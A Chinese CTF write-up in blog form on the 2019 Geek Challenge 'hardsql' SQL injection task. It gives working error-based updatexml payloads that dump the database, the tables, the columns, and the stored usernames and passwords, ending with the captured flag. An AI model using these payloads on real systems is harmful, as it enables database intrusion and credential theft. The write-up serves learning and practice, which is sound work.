从2019极客大挑战sql题看sql注入(续）

书接上回，2019极挑还有两题较难的sql注入（虽然对大佬来说非常简单），想借此来记录自己不太会的题目_(:з」∠)_

目录

1.hardsql

1.1尝试爆库

 1.2尝试爆表

 1.3爆字段

 1.4爆破字段内容

2finalsql

3.总结

 附言

---

1.hardsql

尝试union，万能钥匙，order by 都失败。于是看了一下大佬的题解，得知是报错注入（报错注入和时间注入确实不太会）

 这里附上学习地址

报错注入是什么？一看你就明白了。报错注入原理+步骤+实战案例_士别三日wyx的博客-优快云博客

1.1尝试爆库

payload 

?username=1%27or%28updatexml%281,concat(0x7e,database(),0x7e),1))%23&password=1221

 

 1.2尝试爆表

payload

?username=1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=1221

 1.3爆字段

?username=1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=1221

 1.4爆破字段内容

payload 

?username=1'or(updatexml(1,concat(0x7e,(select(group_concat(id,0x3e,username,0x3e,password))from(geek.H4rDsq1)),0x7e),1))%23&password=1221

 

发现只有一半，看了大佬wp后发现要用right（）和left（）。于是再次构建payload

?username=1'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(geek.H4rDsq1)),0x7e),1))%23&password=1221

 拼合得到flag、

flag{d53789d2-7e69-4958-a9ab-583500b2ec0d}

2finalsql

布尔盲注，还得跑代码就涉及知识盲区了，在这里就只挂个大佬的wp，等以后技术娴熟了再回头来试试。

BUUCTF [极客大挑战 2019]FinalSQL_Chu_Jian_JX的博客-优快云博客_buuctf finalsql

3.总结

感觉自己不太会的就是布尔盲注，时间注入，报错注入。

其中布尔盲注只能看运气，sqlmap可以辅助但还是有不懂的地方。时间注入基本没做到过题目(还得再刷)。报错注入做过几道题目但还不熟。

在有绕过的情况下，要非常注意括号数量一不小心就会多几个或少几个。还有一般的查询语句不要搞错，手注特别容易打错data->date 这些。。。。

在对付过滤的时候有些知识是必备的在这附上一个链接，方便以后面对过滤时有办法应对。

SQL注入一些过滤及绕过总结_obsetear的博客-优快云博客_sql注入关键字过滤绕过

 附言

接下来还得总结一下文件传输题目和伪协议，代码审计等。当然sql其实也只会了一点基础Orz。

希望自己不要这么菜了。。。。。